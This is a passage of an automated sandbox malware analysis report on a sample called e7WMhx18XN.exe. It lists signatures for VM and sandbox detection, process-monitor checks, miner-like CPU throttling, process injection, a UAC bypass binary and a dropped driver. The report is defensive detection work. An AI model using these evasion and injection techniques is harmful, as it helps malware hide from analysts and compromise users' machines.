        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Contains functionality to compare user and computer (likely to detect sandboxes)
        Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,94_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,95_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,97_2_0000000140001868
        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
        Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeMemory allocated: 1B260000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6336
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3481
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2757
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7107
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2089
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8131
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1347
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8472
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 469
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8845
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 561
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8877
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 498
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8547
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1003
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5442
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6183
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1570
        Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
        Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_94-618
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_56-246
        Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_94-625
        Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_94-560
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe TID: 7836Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\explorer.exe TID: 5808Thread sleep count: 144 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 6336 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep count: 3481 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3408Thread sleep time: -6456360425798339s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952Thread sleep count: 2757 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2712Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep count: 175 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep count: 8131 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep count: 1347 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 8472 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 469 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep time: -12912720851596678s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 8845 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2956Thread sleep count: 561 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep time: -14757395258967632s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4100Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 8877 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 498 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep time: -14757395258967632s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3504Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep count: 8547 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900Thread sleep count: 1003 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992Thread sleep count: 35 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3600Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 5442 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep count: 107 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 6183 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 504Thread sleep count: 1570 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1384Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1232Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\dllhost.exe TID: 6412Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\dllhost.exe TID: 4948Thread sleep count: 158 > 30
        Source: C:\Windows\System32\dllhost.exe TID: 3976Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 3520Thread sleep count: 251 > 30
        Source: C:\Windows\System32\lsass.exe TID: 2780Thread sleep count: 43 > 30
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
